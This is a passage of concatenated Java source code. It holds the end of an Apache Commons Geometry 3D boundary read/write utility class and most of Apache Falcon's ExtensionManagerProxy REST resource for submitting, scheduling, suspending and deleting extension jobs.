input {@link GeometryInput#getFileName() file name} * @param precision precision context used for floating point comparisons * @return a mesh containing all triangles from the input * @throws IllegalArgumentException if mathematically invalid data is encountered or no read handler * is registered with the {@link #getDefaultManager() default manager} for the input format * @throws IllegalStateException if a data format error occurs * @throws java.io.UncheckedIOException if an I/O error occurs * @see BoundaryIOManager3D#readTriangleMesh(GeometryInput, GeometryFormat, Precision.DoubleEquivalence) */ public static TriangleMesh readTriangleMesh(final GeometryInput in, final GeometryFormat fmt, final Precision.DoubleEquivalence precision) { return getDefaultManager().readTriangleMesh(in, fmt, precision); } /** Write all boundaries in the stream to given file path. The data format is determined by * the file extension of the target path. If the target path already exists, it is overwritten. * * <p>This method does not explicitly close the {@code boundaries} stream. Callers should use the stream * in a try-with-resources statement outside of this method if the stream is required to be closed.</p> * @param boundaries stream containing boundaries to write * @param path file path to write to * @throws IllegalArgumentException if no write handler is registered with the * {@link #getDefaultManager() default manager} for the output format * @throws java.io.UncheckedIOException if an I/O error occurs * @see BoundaryIOManager3D#write(Stream, GeometryOutput, GeometryFormat) */ public static void write(final Stream<? extends PlaneConvexSubset> boundaries, final Path path) { write(boundaries, new FileGeometryOutput(path), null); } /** Write all boundaries in the stream to the output. * * <p>This method does not explicitly close the {@code boundaries} stream. Callers should use the stream * in a try-with-resources statement outside of this method if the stream is required to be closed.</p> * @param boundaries stream containing boundaries to write * @param out output to write to * @param fmt format of the output; if {@code null}, the format is determined implicitly from the * file extension of the output {@link GeometryOutput#getFileName() file name} * @throws IllegalArgumentException if no write handler is registered with the * {@link #getDefaultManager() default manager} for the output format * @throws java.io.UncheckedIOException if an I/O error occurs * @see BoundaryIOManager3D#write(Stream, GeometryOutput, GeometryFormat) */ public static void write(final Stream<? extends PlaneConvexSubset> boundaries, final GeometryOutput out, final GeometryFormat fmt) { getDefaultManager().write(boundaries, out, fmt); } /** Write all boundaries from {@code src} to the given file path. The data format * is determined by the file extension of the target path. If the target path already exists, * it is overwritten. * @param src boundary source containing the boundaries to write * @param path file path to write to * @throws IllegalArgumentException if no write handler is registered with the * {@link #getDefaultManager() default manager} for the output format * @throws java.io.UncheckedIOException if an I/O error occurs * @see org.apache.commons.geometry.io.core.BoundaryIOManager#write( * org.apache.commons.geometry.core.partitioning.BoundarySource, GeometryOutput, GeometryFormat) */ public static void write(final BoundarySource3D src, final Path path) { write(src, new FileGeometryOutput(path), null); } /** Write all boundaries from {@code src} to the given output. * @param src boundary source containing the boundaries to write * @param out output to write to * @param fmt format of the output; if {@code null}, the format is determined implicitly from the * file extension of the output {@link GeometryOutput#getFileName() file name} * @throws IllegalArgumentException if no write handler is registered with the * {@link #getDefaultManager() default manager} for the output format * @throws java.io.UncheckedIOException if an I/O error occurs * @see org.apache.commons.geometry.io.core.BoundaryIOManager#write( * org.apache.commons.geometry.core.partitioning.BoundarySource, GeometryOutput, GeometryFormat) */ public static void write(final BoundarySource3D src, final GeometryOutput out, final GeometryFormat fmt) { getDefaultManager().write(src, out, fmt); } /** Write the given facets to the file path. The data format is determined by the file extension of * the target path. If the target path already exists, it is overwritten. * @param facets facets to write * @param path path to write to * @throws IllegalArgumentException if no write handler is registered with the * {@link #getDefaultManager() default manager} for the output format * @throws java.io.UncheckedIOException if an I/O error occurs * @see BoundaryIOManager3D#writeFacets(Collection, GeometryOutput, GeometryFormat) */ public static void writeFacets(final Collection<? extends FacetDefinition> facets, final Path path) { writeFacets(facets, new FileGeometryOutput(path), null); } /** Write the given collection of facets to the output. * @param facets facets to write * @param out output to write to * @param fmt format of the output; if {@code null}, the format is determined implicitly from the * file extension of the output {@link GeometryOutput#getFileName() file name} * @throws IllegalArgumentException if no write handler is registered with the * {@link #getDefaultManager() default manager} for the output format * @throws java.io.UncheckedIOException if an I/O error occurs * @see BoundaryIOManager3D#writeFacets(Collection, GeometryOutput, GeometryFormat) */ public static void writeFacets(final Collection<? extends FacetDefinition> facets, final GeometryOutput out, final GeometryFormat fmt) { getDefaultManager().writeFacets(facets, out, fmt); } /** Write all facets in the stream to the file path. The data format is determined by the file * extension of the target path. If the target path already exists, it is overwritten. * * <p>This method does not explicitly close the {@code facets} stream. Callers should use the stream * in a try-with-resources statement outside of this method if the stream is required to be closed.</p> * @param facets stream containing facets to write * @param path path to write to * @throws IllegalArgumentException if no write handler is registered with the * {@link #getDefaultManager() default manager} for the output format * @throws java.io.UncheckedIOException if an I/O error occurs * @see BoundaryIOManager3D#writeFacets(Stream, GeometryOutput, GeometryFormat) */ public static void writeFacets(final Stream<? extends FacetDefinition> facets, final Path path) { writeFacets(facets, new FileGeometryOutput(path), null); } /** Write all facets in the stream to the output. * * <p>This method does not explicitly close the {@code facets} stream. Callers should use the stream * in a try-with-resources statement outside of this method if the stream is required to be closed.</p> * @param facets stream containing facets to write * @param out output to write to * @param fmt format of the output; if {@code null}, the format is determined implicitly from the * file extension of the output {@link GeometryOutput#getFileName() file name} * @throws IllegalArgumentException if no write handler is registered with the * {@link #getDefaultManager() default manager} for the output format * @throws java.io.UncheckedIOException if an I/O error occurs * @see BoundaryIOManager3D#writeFacets(Stream, GeometryOutput, GeometryFormat) */ public static void writeFacets(final Stream<? extends FacetDefinition> facets, final GeometryOutput out, final GeometryFormat fmt) { getDefaultManager().writeFacets(facets, out, fmt); } /** Get the default {@link BoundaryIOManager3D} instance. * @return the default {@link BoundaryIOManager3D} instance */ public static BoundaryIOManager3D getDefaultManager() { return ManagerHolder.DEFAULT_MANAGER; } /** Class holding a reference to the default IO manager instance. */ private static final class ManagerHolder { /** Default IO manager instance. */ private static final BoundaryIOManager3D DEFAULT_MANAGER; static { DEFAULT_MANAGER = new BoundaryIOManager3D(); DEFAULT_MANAGER.registerDefaultHandlers(); } /** Utility class; no instantiation. */ private ManagerHolder() {} } }
apache/falcon
36,007
prism/src/main/java/org/apache/falcon/resource/proxy/ExtensionManagerProxy.java
/** * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.falcon.resource.proxy; import com.sun.jersey.multipart.FormDataBodyPart; import com.sun.jersey.multipart.FormDataParam; import java.io.ByteArrayInputStream; import java.io.ByteArrayOutputStream; import java.io.File; import java.io.IOException; import java.io.InputStream; import java.util.ArrayList; import java.util.List; import java.util.Map; import java.util.Set; import java.util.SortedMap; import java.util.TreeMap; import java.util.Properties; import javax.servlet.ServletInputStream; import javax.servlet.http.HttpServletRequest; import javax.ws.rs.Consumes; import javax.ws.rs.DefaultValue; import javax.ws.rs.GET; import javax.ws.rs.POST; import javax.ws.rs.Path; import javax.ws.rs.PathParam; import javax.ws.rs.Produces; import javax.ws.rs.QueryParam; import javax.ws.rs.core.Context; import javax.ws.rs.core.MediaType; import javax.ws.rs.core.Response; import javax.xml.bind.JAXBException; import org.apache.commons.lang.StringUtils; import org.apache.commons.io.IOUtils; import org.apache.falcon.FalconException; import org.apache.falcon.FalconWebException; import org.apache.falcon.entity.EntityUtil; import org.apache.falcon.entity.parser.ProcessEntityParser; import org.apache.falcon.entity.v0.Entity; import org.apache.falcon.entity.v0.EntityType; import org.apache.falcon.entity.v0.feed.Feed; import org.apache.falcon.entity.v0.process.Process; import org.apache.falcon.extensions.Extension; import org.apache.falcon.extensions.ExtensionProperties; import org.apache.falcon.extensions.ExtensionService; import org.apache.falcon.extensions.ExtensionType; import org.apache.falcon.extensions.jdbc.ExtensionMetaStore; import org.apache.falcon.extensions.store.ExtensionStore; import org.apache.falcon.persistence.ExtensionBean; import org.apache.falcon.persistence.ExtensionJobsBean; import org.apache.falcon.resource.APIResult; import org.apache.falcon.resource.AbstractExtensionManager; import org.apache.falcon.resource.ExtensionInstanceList; import org.apache.falcon.resource.ExtensionJobList; import org.apache.falcon.security.CurrentUser; import org.apache.falcon.service.Services; import org.apache.falcon.util.DeploymentUtil; import org.slf4j.Logger; import org.slf4j.LoggerFactory; /** * Jersey Resource for extension job operations. */ @Path("extension") public class ExtensionManagerProxy extends AbstractExtensionManager { public static final Logger LOG = LoggerFactory.getLogger(ExtensionManagerProxy.class); private Extension extension = new Extension(); private static final String README = "README"; private boolean embeddedMode = DeploymentUtil.isEmbeddedMode(); private String currentColo = DeploymentUtil.getCurrentColo(); private EntityProxyUtil entityProxyUtil = new EntityProxyUtil(); private static final String EXTENSION_PROPERTY_JSON_SUFFIX = "-properties.json"; //SUSPEND CHECKSTYLE CHECK ParameterNumberCheck @GET @Path("list{extension-name : (/[^/]+)?}") @Produces({MediaType.TEXT_XML, MediaType.APPLICATION_JSON}) public ExtensionJobList getExtensionJobs( @PathParam("extension-name") String extensionName, @DefaultValue(ASCENDING_SORT_ORDER) @QueryParam("sortOrder") String sortOrder, @DefaultValue("") @QueryParam("doAs") String doAsUser) { checkIfExtensionServiceIsEnabled(); if (StringUtils.isNotBlank(extensionName)) { extensionName = extensionName.substring(1); getExtensionIfExists(extensionName); } try { return super.getExtensionJobs(extensionName, sortOrder, doAsUser); } catch (Throwable e) { LOG.error("Failed to get extension job list of " + extensionName + ": ", e); throw FalconWebException.newAPIException(e, Response.Status.INTERNAL_SERVER_ERROR); } } @GET @Path("instances/{job-name}") @Produces(MediaType.APPLICATION_JSON) public ExtensionInstanceList getInstances( @PathParam("job-name") final String jobName, @QueryParam("start") final String nominalStart, @QueryParam("end") final String nominalEnd, @DefaultValue("") @QueryParam("instanceStatus") String instanceStatus, @DefaultValue("") @QueryParam("fields") String fields, @DefaultValue("") @QueryParam("orderBy") String orderBy, @DefaultValue("") @QueryParam("sortOrder") String sortOrder, @DefaultValue("0") @QueryParam("offset") final Integer offset, @QueryParam("numResults") Integer resultsPerPage, @DefaultValue("") @QueryParam("doAs") String doAsUser) { LOG.error("instances is not supported on Falcon extensions. Use Falcon instance api on individual entities."); throw FalconWebException.newAPIException("instances is not supported on Falcon extensions. Use Falcon instance " + "api on individual entities."); } @POST @Path("schedule/{job-name}") @Consumes({MediaType.TEXT_XML, MediaType.TEXT_PLAIN}) @Produces({MediaType.TEXT_XML, MediaType.TEXT_PLAIN, MediaType.APPLICATION_JSON}) public APIResult schedule(@PathParam("job-name") String jobName, @Context HttpServletRequest request, @QueryParam("colo") final String coloExpr, @DefaultValue("") @QueryParam("doAs") String doAsUser) { checkIfExtensionServiceIsEnabled(); ExtensionMetaStore metaStore = ExtensionStore.getMetaStore(); ExtensionJobsBean extensionJobsBean = metaStore.getExtensionJobDetails(jobName); if (extensionJobsBean == null) { // return failure if the extension job doesn't exist LOG.error("Extension Job not found:" + jobName); throw FalconWebException.newAPIException("ExtensionJob not found:" + jobName, Response.Status.NOT_FOUND); } checkIfExtensionIsEnabled(extensionJobsBean.getExtensionName()); SortedMap<EntityType, List<String>> entityMap; try { entityMap = getJobEntities(extensionJobsBean); scheduleEntities(entityMap, request, coloExpr); } catch (FalconException e) { LOG.error("Error while scheduling entities of the extension: " + jobName + ": ", e); throw FalconWebException.newAPIException(e, Response.Status.INTERNAL_SERVER_ERROR); } return new APIResult(APIResult.Status.SUCCEEDED, "Extension job " + jobName + " scheduled successfully"); } @POST @Path("suspend/{job-name}") @Consumes({MediaType.TEXT_XML, MediaType.TEXT_PLAIN}) @Produces({MediaType.TEXT_XML, MediaType.TEXT_PLAIN, MediaType.APPLICATION_JSON}) public APIResult suspend(@PathParam("job-name") String jobName, @Context HttpServletRequest request, @DefaultValue("") @QueryParam("doAs") String doAsUser, @QueryParam("colo") final String coloExpr) { checkIfExtensionServiceIsEnabled(); ExtensionMetaStore metaStore = ExtensionStore.getMetaStore(); ExtensionJobsBean extensionJobsBean = metaStore.getExtensionJobDetails(jobName); if (extensionJobsBean == null) { // return failure if the extension job doesn't exist LOG.error("Extension Job not found:" + jobName); throw FalconWebException.newAPIException("ExtensionJob not found:" + jobName, Response.Status.NOT_FOUND); } try { SortedMap<EntityType, List<String>> entityNameMap = getJobEntities(extensionJobsBean); suspendEntities(entityNameMap, coloExpr, request); } catch (FalconException e) { LOG.error("Error while suspending entities of the extension: " + jobName + ": ", e); throw FalconWebException.newAPIException(e, Response.Status.INTERNAL_SERVER_ERROR); } return new APIResult(APIResult.Status.SUCCEEDED, "Extension job " + jobName + " suspended successfully"); } private void suspendEntities(SortedMap<EntityType, List<String>> entityNameMap, String coloExpr, final HttpServletRequest request) throws FalconException { HttpServletRequest bufferedRequest = new BufferedRequest(request); for (Map.Entry<EntityType, List<String>> entityTypeEntry : entityNameMap.entrySet()) { for (final String entityName : entityTypeEntry.getValue()) { entityProxyUtil.proxySuspend(entityTypeEntry.getKey().name(), entityName, coloExpr, bufferedRequest); } } } private void resumeEntities(SortedMap<EntityType, List<String>> entityNameMap, String coloExpr, final HttpServletRequest request) throws FalconException { HttpServletRequest bufferedRequest = new BufferedRequest(request); for (Map.Entry<EntityType, List<String>> entityTypeEntry : entityNameMap.entrySet()) { for (final String entityName : entityTypeEntry.getValue()) { entityProxyUtil.proxyResume(entityTypeEntry.getKey().name(), entityName, coloExpr, bufferedRequest); } } } @POST @Path("resume/{job-name}") @Consumes({MediaType.TEXT_XML, MediaType.TEXT_PLAIN}) @Produces({MediaType.TEXT_XML, MediaType.TEXT_PLAIN, MediaType.APPLICATION_JSON}) public APIResult resume(@PathParam("job-name") String jobName, @Context HttpServletRequest request, @QueryParam("colo") final String coloExpr, @DefaultValue("") @QueryParam("doAs") String doAsUser) { checkIfExtensionServiceIsEnabled(); ExtensionMetaStore metaStore = ExtensionStore.getMetaStore(); ExtensionJobsBean extensionJobsBean = metaStore.getExtensionJobDetails(jobName); if (extensionJobsBean == null) { // return failure if the extension job doesn't exist LOG.error("Extension Job not found:" + jobName); throw FalconWebException.newAPIException("ExtensionJob not found:" + jobName, Response.Status.NOT_FOUND); } try { SortedMap<EntityType, List<String>> entityNameMap = getJobEntities(extensionJobsBean); resumeEntities(entityNameMap, coloExpr, request); } catch (FalconException e) { LOG.error("Error while resuming entities of the extension: " + jobName + ": ", e); throw FalconWebException.newAPIException(e, Response.Status.INTERNAL_SERVER_ERROR); } return new APIResult(APIResult.Status.SUCCEEDED, "Extension job " + jobName + " resumed successfully"); } @POST @Path("delete/{job-name}") @Consumes({MediaType.TEXT_XML, MediaType.TEXT_PLAIN}) @Produces({MediaType.TEXT_XML, MediaType.TEXT_PLAIN, MediaType.APPLICATION_JSON}) public APIResult delete(@PathParam("job-name") String jobName, @Context HttpServletRequest request, @DefaultValue("") @QueryParam("doAs") String doAsUser) { checkIfExtensionServiceIsEnabled(); ExtensionMetaStore metaStore = ExtensionStore.getMetaStore(); ExtensionJobsBean extensionJobsBean = metaStore.getExtensionJobDetails(jobName); if (extensionJobsBean == null) { // return failure if the extension job doesn't exist return new APIResult(APIResult.Status.SUCCEEDED, "Extension job " + jobName + " doesn't exist. Nothing to delete."); } SortedMap<EntityType, List<String>> entityMap; try { entityMap = getJobEntities(extensionJobsBean); deleteEntities(entityMap, request); } catch (FalconException e) { LOG.error("Error when deleting extension job: " + jobName + ": ", e); throw FalconWebException.newAPIException(e, Response.Status.INTERNAL_SERVER_ERROR); } metaStore.deleteExtensionJob(jobName); return new APIResult(APIResult.Status.SUCCEEDED, "Extension job " + jobName + " deleted successfully"); } @POST @Path("submit/{extension-name}") @Consumes({MediaType.TEXT_XML, MediaType.TEXT_PLAIN, MediaType.MULTIPART_FORM_DATA, MediaType.APPLICATION_OCTET_STREAM}) @Produces({MediaType.TEXT_XML, MediaType.TEXT_PLAIN, MediaType.APPLICATION_JSON}) public APIResult submit( @PathParam("extension-name") String extensionName, @Context HttpServletRequest request, @DefaultValue("") @QueryParam("doAs") String doAsUser, @QueryParam("jobName") String jobName, @FormDataParam("processes") List<FormDataBodyPart> processForms, @FormDataParam("feeds") List<FormDataBodyPart> feedForms, @FormDataParam("config") InputStream config) { checkIfExtensionServiceIsEnabled(); checkIfExtensionIsEnabled(extensionName); checkIfExtensionJobNameExists(jobName, extensionName); SortedMap<EntityType, List<Entity>> entityMap; try { entityMap = getEntityList(extensionName, jobName, feedForms, processForms, config); submitEntities(extensionName, jobName, entityMap, config, request); } catch (FalconException | IOException | JAXBException e) { LOG.error("Error while submitting extension job: ", e); throw FalconWebException.newAPIException(e, Response.Status.INTERNAL_SERVER_ERROR); } return new APIResult(APIResult.Status.SUCCEEDED, "Extension job submitted successfully:" + jobName); } private SortedMap<EntityType, List<Entity>> getEntityList(String extensionName, String jobName, List<FormDataBodyPart> feedForms, List<FormDataBodyPart> processForms, InputStream config) throws FalconException, IOException { List<Entity> processes = getProcesses(processForms); List<Entity> feeds = getFeeds(feedForms); ExtensionType extensionType = getExtensionType(extensionName); List<Entity> entities; TreeMap<EntityType, List<Entity>> entityMap = new TreeMap<>(); if (ExtensionType.TRUSTED.equals(extensionType)) { entities = extension.getEntities(jobName, addJobNameToConf(config, jobName)); feeds = new ArrayList<>(); processes = new ArrayList<>(); for (Entity entity : entities) { if (EntityType.FEED.equals(entity.getEntityType())) { feeds.add(entity); } else { processes.add(entity); } } } // add tags on extension name and job EntityUtil.applyTags(extensionName, jobName, processes); EntityUtil.applyTags(extensionName, jobName, feeds); entityMap.put(EntityType.PROCESS, processes); entityMap.put(EntityType.FEED, feeds); return entityMap; } private InputStream addJobNameToConf(InputStream conf, String jobName) throws FalconException{ Properties inputProperties = new Properties(); ByteArrayOutputStream output = new ByteArrayOutputStream(); try { inputProperties.load(conf); inputProperties.setProperty(ExtensionProperties.JOB_NAME.getName(), jobName); inputProperties.store(output, null); } catch (IOException e) { LOG.error("Error in reading the config stream"); throw new FalconException("Error while reading the config stream", e); } return new ByteArrayInputStream(output.toByteArray()); } private ExtensionType getExtensionType(String extensionName) { ExtensionBean extensionDetails = getExtensionIfExists(extensionName); return extensionDetails.getExtensionType(); } private String getExtensionName(String jobName) { ExtensionMetaStore metaStore = ExtensionStore.getMetaStore(); ExtensionJobsBean extensionJobDetails = metaStore.getExtensionJobDetails(jobName); if (extensionJobDetails == null) { // return failure if the extension job doesn't exist LOG.error("Extension job not found: " + jobName); throw FalconWebException.newAPIException("Extension Job not found:" + jobName, Response.Status.NOT_FOUND); } return extensionJobDetails.getExtensionName(); } @POST @Path("submitAndSchedule/{extension-name}") @Consumes({MediaType.TEXT_XML, MediaType.TEXT_PLAIN, MediaType.MULTIPART_FORM_DATA}) @Produces({MediaType.TEXT_XML, MediaType.TEXT_PLAIN, MediaType.APPLICATION_JSON}) public APIResult submitAndSchedule( @PathParam("extension-name") String extensionName, @Context HttpServletRequest request, @DefaultValue("") @QueryParam("doAs") String doAsUser, @QueryParam("jobName") String jobName, @QueryParam("colo") final String coloExpr, @FormDataParam("processes") List<FormDataBodyPart> processForms, @FormDataParam("feeds") List<FormDataBodyPart> feedForms, @FormDataParam("config") InputStream config) { checkIfExtensionServiceIsEnabled(); checkIfExtensionIsEnabled(extensionName); checkIfExtensionJobNameExists(jobName, extensionName); SortedMap<EntityType, List<Entity>> entityMap; SortedMap<EntityType, List<String>> entityNameMap; ExtensionMetaStore metaStore = ExtensionStore.getMetaStore(); try { entityMap = getEntityList(extensionName, jobName, feedForms, processForms, config); submitEntities(extensionName, jobName, entityMap, config, request); entityNameMap = getJobEntities(metaStore.getExtensionJobDetails(jobName)); scheduleEntities(entityNameMap, request, coloExpr); } catch (FalconException | IOException | JAXBException e) { LOG.error("Error while submitting extension job: ", e); throw FalconWebException.newAPIException(e, Response.Status.INTERNAL_SERVER_ERROR); } return new APIResult(APIResult.Status.SUCCEEDED, "Extension job submitted and scheduled successfully"); } private void scheduleEntities(SortedMap<EntityType, List<String>> entityMap, HttpServletRequest request, String coloExpr) throws FalconException { HttpServletRequest bufferedRequest = new BufferedRequest(request); for (Map.Entry<EntityType, List<String>> entityTypeEntry : entityMap.entrySet()) { for (final String entityName : entityTypeEntry.getValue()) { entityProxyUtil.proxySchedule(entityTypeEntry.getKey().name(), entityName, coloExpr, Boolean.FALSE, "", bufferedRequest); } } } private BufferedRequest getBufferedRequest(HttpServletRequest request) { if (request instanceof BufferedRequest) { return (BufferedRequest) request; } return new BufferedRequest(request); } private void deleteEntities(SortedMap<EntityType, List<String>> entityMap, HttpServletRequest request) throws FalconException { for (Map.Entry<EntityType, List<String>> entityTypeEntry : entityMap.entrySet()) { for (final String entityName : entityTypeEntry.getValue()) { HttpServletRequest bufferedRequest = new BufferedRequest(request); entityProxyUtil.proxyDelete(entityTypeEntry.getKey().name(), entityName, bufferedRequest); if (!embeddedMode) { super.delete(bufferedRequest, entityTypeEntry.getKey().name(), entityName, currentColo); } } } } private void submitEntities(String extensionName, String jobName, SortedMap<EntityType, List<Entity>> entityMap, InputStream configStream, HttpServletRequest request) throws FalconException, IOException, JAXBException { List<Entity> feeds = entityMap.get(EntityType.FEED); List<Entity> processes = entityMap.get(EntityType.PROCESS); validateFeeds(feeds, jobName); validateProcesses(processes, jobName); List<String> feedNames = new ArrayList<>(); List<String> processNames = new ArrayList<>(); ExtensionMetaStore metaStore = ExtensionStore.getMetaStore(); byte[] configBytes = null; if (configStream != null) { configBytes = IOUtils.toByteArray(configStream); } for (Map.Entry<EntityType, List<Entity>> entry : entityMap.entrySet()) { for (final Entity entity : entry.getValue()) { if (entity.getEntityType().equals(EntityType.FEED)) { feedNames.add(entity.getName()); } else { processNames.add(entity.getName()); } } } metaStore.storeExtensionJob(jobName, extensionName, feedNames, processNames, configBytes); for(Map.Entry<EntityType, List<Entity>> entry : entityMap.entrySet()){ for(final Entity entity : entry.getValue()){ final HttpServletRequest bufferedRequest = getEntityStream(entity, entity.getEntityType(), request); final Set<String> colos = getApplicableColos(entity.getEntityType().toString(), entity); entityProxyUtil.proxySubmit(entity.getEntityType().toString(), bufferedRequest, entity, colos); if (!embeddedMode) { super.submit(bufferedRequest, entity.getEntityType().toString(), currentColo); } } } } private void updateEntities(String extensionName, String jobName, SortedMap<EntityType, List<Entity>> entityMap, InputStream configStream, HttpServletRequest request) throws FalconException, IOException, JAXBException { List<Entity> feeds = entityMap.get(EntityType.FEED); List<Entity> processes = entityMap.get(EntityType.PROCESS); validateFeeds(feeds, jobName); validateProcesses(processes, jobName); List<String> feedNames = new ArrayList<>(); List<String> processNames = new ArrayList<>(); for (Map.Entry<EntityType, List<Entity>> entry : entityMap.entrySet()) { for (final Entity entity : entry.getValue()) { final String entityType = entity.getEntityType().toString(); final String entityName = entity.getName(); final HttpServletRequest bufferedRequest = getEntityStream(entity, entity.getEntityType(), request); entityProxyUtil.proxyUpdate(entityType, entityName, Boolean.FALSE, bufferedRequest, entity); if (!embeddedMode) { super.update(bufferedRequest, entity.getEntityType().toString(), entity.getName(), currentColo, Boolean.FALSE); } if (entity.getEntityType().equals(EntityType.FEED)) { feedNames.add(entity.getName()); } else { processNames.add(entity.getName()); } } } ExtensionMetaStore metaStore = ExtensionStore.getMetaStore(); byte[] configBytes = null; if (configStream != null) { configBytes = IOUtils.toByteArray(configStream); } metaStore.updateExtensionJob(jobName, extensionName, feedNames, processNames, configBytes); } private HttpServletRequest getEntityStream(Entity entity, EntityType type, HttpServletRequest request) throws IOException, JAXBException { ByteArrayOutputStream baos = new ByteArrayOutputStream(); type.getMarshaller().marshal(entity, baos); final ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(baos.toByteArray()); ServletInputStream servletInputStream = new ServletInputStream() { public int read() throws IOException { return byteArrayInputStream.read(); } }; return getBufferedRequest(new HttpServletRequestInputStreamWrapper(request, servletInputStream)); } private void validateFeeds(List<Entity> feeds, String jobName) throws FalconException { for (Entity feed : feeds) { checkIfPartOfAnotherExtension(feed.getName(), EntityType.FEED, jobName); super.validate(feed); } } private void validateProcesses(List<Entity> processes, String jobName) throws FalconException { ProcessEntityParser processEntityParser = new ProcessEntityParser(); for (Entity process : processes) { checkIfPartOfAnotherExtension(process.getName(), EntityType.PROCESS, jobName); processEntityParser.validate((Process) process, false); } } private List<Entity> getFeeds(List<FormDataBodyPart> feedForms) { List<Entity> feeds = new ArrayList<>(); if (feedForms != null && !feedForms.isEmpty()) { for (FormDataBodyPart formDataBodyPart : feedForms) { feeds.add(formDataBodyPart.getValueAs(Feed.class)); } } return feeds; } private List<Entity> getProcesses(List<FormDataBodyPart> processForms) { List<Entity> processes = new ArrayList<>(); if (processForms != null && !processForms.isEmpty()) { for (FormDataBodyPart formDataBodyPart : processForms) { processes.add(formDataBodyPart.getValueAs(Process.class)); } } return processes; } @POST @Path("update/{job-name}") @Consumes({MediaType.TEXT_XML, MediaType.TEXT_PLAIN, MediaType.MULTIPART_FORM_DATA}) @Produces({MediaType.TEXT_XML, MediaType.TEXT_PLAIN, MediaType.APPLICATION_JSON}) public APIResult update( @PathParam("job-name") String jobName, @Context HttpServletRequest request, @DefaultValue("") @QueryParam("doAs") String doAsUser, @FormDataParam("processes") List<FormDataBodyPart> processForms, @FormDataParam("feeds") List<FormDataBodyPart> feedForms, @FormDataParam("config") InputStream config) { checkIfExtensionServiceIsEnabled(); SortedMap<EntityType, List<Entity>> entityMap; String extensionName = getExtensionName(jobName); checkIfExtensionIsEnabled(extensionName); try { entityMap = getEntityList(extensionName, jobName, feedForms, processForms, config); if (entityMap.get(EntityType.FEED).isEmpty() && entityMap.get(EntityType.PROCESS).isEmpty()) { // return failure if the extension job doesn't exist return new APIResult(APIResult.Status.FAILED, "Extension job " + jobName + " doesn't exist."); } updateEntities(extensionName, jobName, entityMap, config, request); } catch (FalconException | IOException | JAXBException e) { LOG.error("Error while updating extension job: " + jobName, e); throw FalconWebException.newAPIException(e, Response.Status.INTERNAL_SERVER_ERROR); } return new APIResult(APIResult.Status.SUCCEEDED, "Updated successfully"); } @POST @Path("validate/{extension-name}") @Consumes({MediaType.TEXT_XML, MediaType.TEXT_PLAIN}) @Produces({MediaType.TEXT_XML, MediaType.TEXT_PLAIN, MediaType.APPLICATION_JSON}) public APIResult validate( @PathParam("extension-name") String extensionName, @Context HttpServletRequest request, @DefaultValue("") @QueryParam("doAs") String doAsUser) { checkIfExtensionServiceIsEnabled(); ExtensionType extensionType = getExtensionType(extensionName); if (!ExtensionType.TRUSTED.equals(extensionType)) { throw FalconWebException.newAPIException("Extension validation is supported only for trusted extensions"); } try { List<Entity> entities = extension.getEntities(extensionName, request.getInputStream()); for (Entity entity : entities) { super.validate(entity); } } catch (FalconException | IOException e) { LOG.error("Error when validating extension job: ", e); throw FalconWebException.newAPIException(e, Response.Status.INTERNAL_SERVER_ERROR); } return new APIResult(APIResult.Status.SUCCEEDED, "Validated successfully"); } // Extension store related REST API's @GET @Path("enumerate") @Produces({MediaType.TEXT_PLAIN, MediaType.TEXT_XML}) public APIResult getExtensions() { checkIfExtensionServiceIsEnabled(); try { return super.getExtensions(); } catch (FalconWebException e) { throw FalconWebException.newAPIException(e, Response.Status.INTERNAL_SERVER_ERROR); } } @GET @Path("describe/{extension-name}") @Produces({MediaType.TEXT_PLAIN, MediaType.TEXT_XML}) public APIResult getExtensionDescription( @PathParam("extension-name") String extensionName) { checkIfExtensionServiceIsEnabled(); ExtensionBean extensionBean = getExtensionIfExists(extensionName); try { String extensionResourcePath = extensionBean.getLocation() + File.separator + README; return new APIResult(APIResult.Status.SUCCEEDED, ExtensionStore.get().getResource(extensionResourcePath)); } catch (FalconException e) { throw FalconWebException.newAPIException(e, Response.Status.BAD_REQUEST); } catch (Throwable e) { throw FalconWebException.newAPIException(e, Response.Status.INTERNAL_SERVER_ERROR); } } @GET @Path("detail/{extension-name}") @Produces({MediaType.APPLICATION_JSON, MediaType.TEXT_XML, MediaType.TEXT_PLAIN}) public APIResult getDetail(@PathParam("extension-name") String extensionName) { checkIfExtensionServiceIsEnabled(); validateExtensionName(extensionName); try { return super.getExtensionDetail(extensionName); } catch (Throwable e) { throw FalconWebException.newAPIException(e, Response.Status.INTERNAL_SERVER_ERROR); } } @GET @Path("extensionJobDetails/{job-name}") @Produces({MediaType.APPLICATION_JSON, MediaType.TEXT_XML, MediaType.TEXT_PLAIN}) public APIResult getExtensionJobDetail(@PathParam("job-name") String jobName) { checkIfExtensionServiceIsEnabled(); try { return super.getExtensionJobDetail(jobName); } catch (Throwable e) { throw FalconWebException.newAPIException(e, Response.Status.INTERNAL_SERVER_ERROR); } } @POST @Path("unregister/{extension-name}") @Consumes({MediaType.TEXT_XML, MediaType.TEXT_PLAIN}) @Produces({MediaType.TEXT_PLAIN, MediaType.TEXT_XML}) public APIResult deleteExtensionMetadata( @PathParam("extension-name") String extensionName) { checkIfExtensionServiceIsEnabled(); try { return super.deleteExtensionMetadata(extensionName); } catch (Throwable e) { throw FalconWebException.newAPIException(e, Response.Status.INTERNAL_SERVER_ERROR); } } @POST @Path("register/{extension-name}") @Consumes({MediaType.TEXT_XML, MediaType.TEXT_PLAIN}) @Produces({MediaType.TEXT_PLAIN, MediaType.TEXT_XML}) public APIResult registerExtensionMetadata( @PathParam("extension-name") String extensionName, @QueryParam("path") String path, @QueryParam("description") String description) { checkIfExtensionServiceIsEnabled(); try { return super.registerExtensionMetadata(extensionName, path, description, CurrentUser.getUser()); } catch (Throwable e) { throw FalconWebException.newAPIException(e, Response.Status.INTERNAL_SERVER_ERROR); } } @GET @Path("definition/{extension-name}") @Produces({MediaType.TEXT_PLAIN, MediaType.TEXT_XML}) public APIResult getExtensionDefinition( @PathParam("extension-name") String extensionName) { checkIfExtensionServiceIsEnabled(); ExtensionBean extensionBean = getExtensionIfExists(extensionName); try { ExtensionType extensionType = 